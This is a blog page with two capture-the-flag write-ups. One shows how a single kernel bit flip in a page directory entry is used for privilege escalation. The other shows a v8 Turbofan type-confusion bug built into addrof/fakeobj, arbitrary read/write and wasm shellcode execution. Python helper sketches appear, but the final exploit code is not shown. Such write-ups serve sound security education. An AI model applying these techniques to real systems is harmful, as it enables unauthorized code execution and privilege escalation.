Monday, April 12, 2021

MidnightsunQuals 2021 BroHammer Writeup (Single Bit Flip to Kernel Privilege Escalation)

Last weekend, I played Midnightsun Quals and had a lot of fun with the kernel challenge brohammer. Since I learned a ton of new things from it, I thought it would be nice to make a writeup for it. Before I start, I would like to thank my teammate c3bacd17 for working on this challenge with me and offering some amazing insight into how to approach it. As I proceed with the writeup, feel free to let me know if I made any mistakes in my explanations!

Starting off, we notice that KASLR, SMEP, and SMAP are all off; this should make exploitation much easier. Additionally, we were given the source:

The kernel had a syscall added that gave us an arbitrary one bit flip at any specified address. Usually in a CTF, one of the first things to do with bit flipping challenges is to obtain unlimited bit flips (usually possible due to signed comparisons), but here, an unsigned long is used, so achieving unlimited bit flips is impossible (if it were possible, this challenge would have been trivial). Now, the challenge name “brohammer” sounds suspiciously similar to rowhammer, an attack against DRAM that induces bit flips, which can lead to privilege escalation if page table entries are corrupted to point to physical memory containing a page table of the exploit process. We can use a similar idea to target the page directory/table related information.

In this challenge's kernel, 4-level paging is in use. According to the Intel Manual Volume 3 section 4.5, this means that each virtual address maps to a physical address in the following way: the CR3 register stores the physical address of the PML4, and bits 47:39 of the vaddr select the PML4 entry, which holds the physical location of a page directory pointer table. Bits 38:30 of the vaddr then select an entry in that table. If bit 7 (the PS flag) is set in this entry, then the entry maps a 1 GB page and the rest of the vaddr bits are used as a linear offset into it. Otherwise, it provides the pointer to the physical location of a page directory, and bits 29:21 of the vaddr select the entry in that table. If the PS bit is set in this entry, then it maps a 2 MB page; otherwise, it points to a page table, and the next 9 bits of the vaddr (20:12) select the entry for a 4 KB page, from which the final physical location is obtained.
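To make the walk above concrete, here is a minimal Python sketch that splits a virtual address into the four table indices. The function name `split_vaddr` is my own, and the example address is simply the physmap base mentioned later in this writeup plus 0x1800000.

```python
# Split an x86-64 virtual address into its 4-level paging indices.
# Sketch only: split_vaddr is a hypothetical helper, not part of the challenge.

def split_vaddr(vaddr: int) -> dict:
    return {
        "pml4": (vaddr >> 39) & 0x1FF,   # bits 47:39
        "pdpt": (vaddr >> 30) & 0x1FF,   # bits 38:30
        "pd": (vaddr >> 21) & 0x1FF,     # bits 29:21
        "pt": (vaddr >> 12) & 0x1FF,     # bits 20:12
        "offset_4k": vaddr & 0xFFF,      # offset if the walk ends at a 4 KB page
        "offset_2m": vaddr & 0x1FFFFF,   # offset if a PDE has PS set (2 MB page)
        "offset_1g": vaddr & 0x3FFFFFFF, # offset if a PDPTE has PS set (1 GB page)
    }


if __name__ == "__main__":
    for name, value in split_vaddr(0xFFFF880001800000).items():
        print(f"{name:10s} {value:#x}")
```

Each index is 9 bits wide because every table holds 512 eight-byte entries.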

Each entry also holds multiple control bits (refer to Tables 4-14 to 4-20), but for this challenge, what really mattered were the following bits: bit 1 (R/W), bit 2 (User/Supervisor), and bit 63 (NX).
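As a rough illustration of reading those bits, the sketch below decodes the flags discussed here (plus the present and PS bits) from a raw 64 bit entry. The helper names are hypothetical, and the sample value is the 2 MB page entry quoted in this writeup.

```python
# Decode the control bits that matter for this challenge from a raw entry.
# Sketch only: decode_entry and page_base_2m are hypothetical helper names.

FLAG_BITS = {
    "P": 0,    # present
    "RW": 1,   # writable
    "US": 2,   # user-mode accessible
    "PS": 7,   # large page (meaningful in PDPT and PD entries)
    "NX": 63,  # no-execute
}


def decode_entry(entry: int) -> dict:
    return {name: bool((entry >> bit) & 1) for name, bit in FLAG_BITS.items()}


def page_base_2m(entry: int) -> int:
    # Physical base of a 2 MB page: bits 51:21 of the entry.
    return entry & 0x000FFFFFFFE00000


if __name__ == "__main__":
    entry = 0x10001E1
    print(decode_entry(entry), hex(page_base_2m(entry)))
```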

To make it easier for c3bacd17 and me to look through such data, we quickly wrote a parser to dig around physical memory for the aforementioned tables with the help of the QEMU monitor ("pmemsave 0 0x8000000 memdump", which covers the amount of given memory, and "info tlb" were really helpful for this challenge, thanks to this writeup of the prequel to this challenge). The first idea I had was to attempt to gain usermode access to kernel memory; the brohammer function sounded like a nice target. Looking at the vaddr to paddr conversion in our parser, we note the following (note that this section is mapped as a 2 MB page):

Looking at the bits of the value 0000000000000000000000000000000000000001000000000000000111100001, we thought that we could just set bit 2 to enable usermode access and win! However, that leaves the question of writeability, and additionally, we didn't even gain usermode access there afterwards. Looking at Section 4.6 of the same volume, we discovered the following:

“Access rights are also controlled by the mode of a linear address as specified by the paging-structure entries controlling the translation of the linear address. If the U/S flag (bit 2) is 0 in at least one of the paging-structure entries, the address is a supervisor-mode address. Otherwise, the address is a user-mode address.”

Well, the page directory table value already violates that rule, so our target will still be considered to be within supervisor access only. The same applies to R/W.
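The rule quoted from Section 4.6 boils down to a logical AND over every entry in the translation chain. Here is a small sketch of that check as seen from user mode; the upper-level entry values in the usage example are made up for illustration and do not come from the challenge's memory dump.

```python
# Effective user-mode permissions are the AND of the bits at every level.
# Sketch only: effective_access is a hypothetical helper.

RW_BIT = 1 << 1
US_BIT = 1 << 2


def effective_access(chain):
    """chain: raw entries from PML4 down to the entry that maps the page."""
    user = all(entry & US_BIT for entry in chain)
    writable = all(entry & RW_BIT for entry in chain)
    return user, writable


if __name__ == "__main__":
    # Hypothetical upper entries without U/S, leaf with U/S freshly flipped on.
    print(effective_access([0x1234063, 0x1235063, 0x10001E5]))
```

With any supervisor-only entry in the chain, setting U/S on the last entry alone changes nothing, which is what we ran into.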

We kept digging through the physical memory dump until c3bacd17 noticed that we could target physmap as well. Without KASLR, it always starts at the virtual address 0xffff880000000000, and it is a large, contiguous region that behaves as a direct mapping of physical memory (the starting location thus maps to 0 in physical memory).

Notice how the entire chain so far has the usermode and writeable bits set, and that the entry at 0x18fb060 is 0x18001e3, where the PS bit (2 MB page) and the writeable bit are set but the usermode bit is not. If we toggle the usermode bit, then we can actually modify a large portion of memory (2 MB) starting from 0x1800000 from userspace. This is really useful, as this region contains the physical address 0x18fb040, which holds the page directory entry for where the kernel is loaded in memory (another 2 MB page), since 0x1000000 is the default physical load address for the Linux kernel; the address of startup_64 from kallsyms and 0xffff880001000000 (physmap base plus the default kernel physical load address) map to the same physical location.
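The arithmetic behind this observation can be checked in a few lines. This sketch assumes both entries live in the same page directory (page-aligned at 0x18fb000) and that this directory covers the first gigabyte of physmap, so that entry i maps physical address i * 2 MB; the helper names are my own.

```python
# Which 2 MB physical range does a page directory entry cover, given the
# entry's own physical address? Sketch under the assumptions stated above.

PAGE_2M = 1 << 21
US_BIT = 1 << 2


def pde_index(entry_paddr: int) -> int:
    return (entry_paddr & 0xFFF) // 8  # 8 bytes per entry, 512 per table


def covered_range(index: int):
    return index * PAGE_2M, (index + 1) * PAGE_2M - 1


if __name__ == "__main__":
    lo, hi = covered_range(pde_index(0x18FB060))
    print(hex(lo), hex(hi))                    # region opened up by the flip
    print(lo <= 0x18FB040 <= hi)               # kernel PDE lies inside it
    print(hex(covered_range(pde_index(0x18FB040))[0]))
    print(hex(0x18001E3 ^ US_BIT))             # entry value after the flip
```

In other words, the entry at 0x18fb060 maps the very page directory it sits in, which is why a single flip is enough to bootstrap further edits.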

At this point, our exploitation strategy is ready to go. We use the bit flip to turn on the usermode bit of the page directory entry at 0x18fb060, which enables usermode access to this region of page directory related information. Now, with usermode access there, we can set the writeable and usermode bits of the entry at 0x18fb040 directly from userspace, and by taking the offset of the brohammer function from the kernel base and applying it to the kernel's physmap alias, we can rewrite the code there thanks to the changed permissions. I just injected a simple commit_creds(init_cred) shellcode. Here is the final exploit:
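The address translation used in this plan can be sketched as follows. The kernel text base 0xffffffff81000000 is an assumption on my part (the usual startup_64 address without KASLR; the real value should be read from kallsyms), and the function address in the usage example is purely hypothetical.

```python
# Translate physical addresses and kernel text addresses to their physmap
# aliases. Sketch only: KERNEL_TEXT_BASE is an assumed value.

PHYSMAP_BASE = 0xFFFF880000000000      # from the writeup (no KASLR)
KERNEL_PHYS_LOAD = 0x1000000           # default physical load address
KERNEL_TEXT_BASE = 0xFFFFFFFF81000000  # assumption: startup_64 without KASLR


def phys_to_physmap(paddr: int) -> int:
    return PHYSMAP_BASE + paddr


def text_to_physmap(text_vaddr: int) -> int:
    offset = text_vaddr - KERNEL_TEXT_BASE
    return phys_to_physmap(KERNEL_PHYS_LOAD + offset)


if __name__ == "__main__":
    print(hex(phys_to_physmap(0x18FB060)))           # PDE to flip first
    print(hex(phys_to_physmap(0x18FB040)))           # PDE to edit from userspace
    print(hex(text_to_physmap(0xFFFFFFFF81012340)))  # hypothetical function address
```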

Interestingly enough, as a few other players pointed out, the TLB caches permissions along with the virtual to physical mappings, so this could have been problematic for the exploit on real hardware (I believe QEMU's behavior isn't exactly faithful here). However, the relevant section of the manual mentions how it would actually work fine after the first attempt at access (which triggers a spurious page fault).

Thanks once again for the interesting challenge, as well as my teammate c3bacd17 for working with me and proofreading this writeup!

Tuesday, April 6, 2021

Turboflan PicoCTF 2021 Writeup (v8 + introductory turbofan pwnable)

This year, picoCTF 2021 introduced a series of browser pwns. The first of the series was a simple shellcoding challenge, the second one was another baby v8 challenge with unlimited OOB indexing (about the same difficulty as the v8 pwnable from my Rope2 writeup, which I recommend reading if you are unfamiliar with v8 exploitation), but what really caught my attention was the last browser pwnable, turboflan, which involved a bug in the turbofan JIT optimizer in Chromium. For those unfamiliar with turbofan, the following post from Jeremy Fetiveau is a nice read. I myself am still quite new to turbofan vulnerabilities, so please let me know if I made a mistake in my explanations.

Looking at the patch file, we see the following changes:

The most important change is the first part in LowerCheckMaps(). When running code, v8 first generates ignition bytecode, and if the code runs many times, Turbofan JIT compiles it based on the types it has seen used previously. When the optimized function encounters a new type, it should usually deoptimize to avoid the dangers of type confusion.

In the patch above, the challenge author specifically removed that deoptimization condition for when the map is different. This can easily lead to a bug by confusing 64 bit float arrays and object arrays (which consist of 32 bit pointers due to pointer compression).

Let's now try to trigger the bug in the provided d8 (with --allow-natives-syntax --trace-turbo --trace-opt --trace-deopt).

The first POC can be as simple as this:

Running in a d8 shell results in the following:

The type confusion did not occur here; in fact, there doesn't even seem to be any sign of optimization here. Doing a bit more digging with %DisassembleFunction in an up to date debug d8, I found that bug() simply got inlined. Turbofan most likely caught this type change early on (in fact, around or before the ByteCode Graph Builder phase according to Turbolizer), hence causing it to just deoptimize as soon as the loop was finished.

Knowing this, my next goal was to prevent inlining, and intuitively, it makes sense to just make the bugged function more complex to prevent such compiler behavior. I just tossed in a random for loop and it went away.

This time, we can see a type confusion in action:

In fact, just out of curiosity, let us compare the Turbolizer outputs (this graph analysis tool was really not necessary for this challenge, but becomes very important in any harder Turbofan bug) between this bugged d8 and a normal d8.

In a normal d8, in TFEffectLinearization, the graph looks like the following:

In the bugged d8, the following is seen:

Notice how there is one less deoptimize condition node. One of the DeoptimizeUnless nodes in normal d8 is precisely where a check for a wrong map occurs. 

Now, let's begin to build some primitives that will eventually lead us to the addrof and fakeobj primitives. I created the following functions to help trigger the JIT bug:

Note that we are simply abusing a type confusion between 64 bit float arrays and 32 bit object arrays (as pointers are now 32 bit due to pointer compression) here; we are not going beyond the array length, as that would trigger a deoptimization due to other checks. Now, if we try to access idx 1 from an object array of 2 elements, the access will actually land where arr[2] would be in the object array, because the JIT code has been optimized for 64 bit arrays (similar to the Rope2 bug mentioned in a previous writeup).
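To visualize the index mismatch, here is a small Python model (not v8 code) of a run of 32 bit slots being read with 64 bit float indexing. The slot values are made-up placeholders, and the helper names are my own.

```python
# Model of reading 32-bit (compressed pointer) slots with 64-bit float indexing.
# Sketch only: the slot contents below are hypothetical placeholders.
import struct


def slots_covered(float_index: int):
    # A 64-bit read at float index i spans 32-bit slots 2i and 2i + 1.
    return 2 * float_index, 2 * float_index + 1


def read_as_float64(slots32, float_index: int) -> float:
    raw = struct.pack("<%dI" % len(slots32), *slots32)
    return struct.unpack_from("<d", raw, 8 * float_index)[0]


def ftoi(value: float) -> int:
    # Reinterpret a float64 as an unsigned 64-bit integer.
    return struct.unpack("<Q", struct.pack("<d", value))[0]


if __name__ == "__main__":
    # Two real elements followed by whatever comes next in memory.
    memory = [0x11, 0x22, 0x33, 0x44]
    print(slots_covered(1))
    print(hex(ftoi(read_as_float64(memory, 1))))
```

So an in-bounds float index of 1 on a two-element object array already reads the two 32 bit slots just past its last element.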

Knowing the above behavior of the bug, we can easily leak the map of an object array (as well as the property pointer of fixed arrays as a confused 64 bit read/write will encounter both when going out of bounds). In at least all pointer compression based versions of v8, the float array map is at a constant offset from the object array map (0x50 specifically), so we will also now have a float array map address.

At this point, addrof and fakeobj are trivial to achieve. To grab the address of any object, we fill an object array of size 2 with the target object. Then, using the confused_write method, we can OOB write and replace the object array map pointer with a float array map pointer (while also preserving the fixed array property, though this step isn't necessary most of the time). Now, returning indices from our array would leak the object addresses (one should restore the original array state afterwards for stability's sake).
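The bookkeeping for that map swap can be modelled in Python as below: split the leaked 64 bit value into its two 32 bit halves, then rebuild it with a different map while keeping the other half. This assumes the map sits in the low half and the properties pointer in the high half (little-endian, map first); all pointer values are hypothetical.

```python
# Split a leaked 64-bit value into (map, properties) and rebuild it with a
# new map. Sketch only: helper names and pointer values are hypothetical.
import struct


def ftoi(value: float) -> int:
    return struct.unpack("<Q", struct.pack("<d", value))[0]


def itof(value: int) -> float:
    return struct.unpack("<d", struct.pack("<Q", value))[0]


def split_leak(leak: float):
    raw = ftoi(leak)
    return raw & 0xFFFFFFFF, raw >> 32  # (map, properties)


def with_new_map(leak: float, new_map: int) -> float:
    _, properties = split_leak(leak)
    return itof((properties << 32) | new_map)


if __name__ == "__main__":
    leak = itof(0x0804222D0824AAA1)            # hypothetical confused read
    print([hex(x) for x in split_leak(leak)])
    print(hex(ftoi(with_new_map(leak, 0x0824BBB1))))
```

The float returned by `with_new_map` is what a confused 64 bit write would store to swap the map in one go.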

fakeobj is even simpler. We can just use confused_write without OOB to directly change the addresses in the object array due to the type confusion, and return the new objects.

Now, arb read and arb write can be achieved. Unlike my previous Rope2 writeup, I have since discovered that map pointers can constantly be reused, making these primitives much easier to build. For both primitives, you create a float array with the first element holding a map pointer. Then you create a fake object over the part of memory holding those values, edit the array (with the original array object) to modify where the length and the element pointer would be, and now indexing into the fake object will give you arb read and arb write.
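As a rough model of the fake object's contents, the sketch below packs the two float values that would sit in the controlled float array. It assumes the usual pointer-compressed array header layout (map, properties, elements, length as four 32 bit fields), a length stored as a Smi (value shifted left by one), tagged pointers (low bit set), and an 8 byte header in front of the element data; none of these details are stated in this writeup, and every pointer value is hypothetical.

```python
# Build the two float64 values describing a fake float array whose elements
# pointer targets an arbitrary address. Sketch under the assumptions above.
import struct


def ftoi(value: float) -> int:
    return struct.unpack("<Q", struct.pack("<d", value))[0]


def itof(value: int) -> float:
    return struct.unpack("<d", struct.pack("<Q", value))[0]


def smi(n: int) -> int:
    return n << 1  # assumption: 31-bit Smi encoding


def fake_array_fields(map_ptr: int, props_ptr: int, target: int, length: int):
    # Element data is assumed to start 8 bytes after the elements pointer.
    elements_ptr = (target - 8) | 1
    first = map_ptr | (props_ptr << 32)
    second = elements_ptr | (smi(length) << 32)
    return itof(first), itof(second)


if __name__ == "__main__":
    f1, f2 = fake_array_fields(0x0824BBB1, 0x08042001, 0x08100000, 4)
    print(hex(ftoi(f1)), hex(ftoi(f2)))
```

Indexing element 0 of the resulting fake array would then read or write 8 bytes at `target`, and only the second value needs to change between accesses.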

The rest of the exploit is the generic Chrome exploit procedure without a sandbox: initialize a wasm instance to create an rwx page, get the address of the wasm instance object, arb read its 64 bit pointer to the rwx page, and write shellcode outside the v8 heap (into the wasm page) by changing the 64 bit backing store pointer of an ArrayBuffer (use DataView to write to it). Then, calling the wasm function should trigger the shellcode. Sadly, the remote wasn't set up with an actual Chrome (it only used a d8), had strict firewall rules (so no reverse shells or bind shells), and would only let us see the stdout and stderr after running d8 (so no shell popping either); I just had to write an open/read/write shellcode :(

Here is my final exploit:

Overall, this was a very nice browser challenge to get people interested in turbofan related bugs; thanks to the author wparks for making this pwnable and helping me clear up a few v8 related questions post-solve, and to my teammate pottm for the thorough proofread! These tasks were a refreshing change from the usual heap notes PicoCTF is famous for (though there were more format string tasks, which honestly are a crime against the category of pwn at this point and should just be removed from CTFs). For those interested in more advanced and realistic Turbofan challenges, I highly recommend the challenge Modern Typer made by Faith on HackTheBox.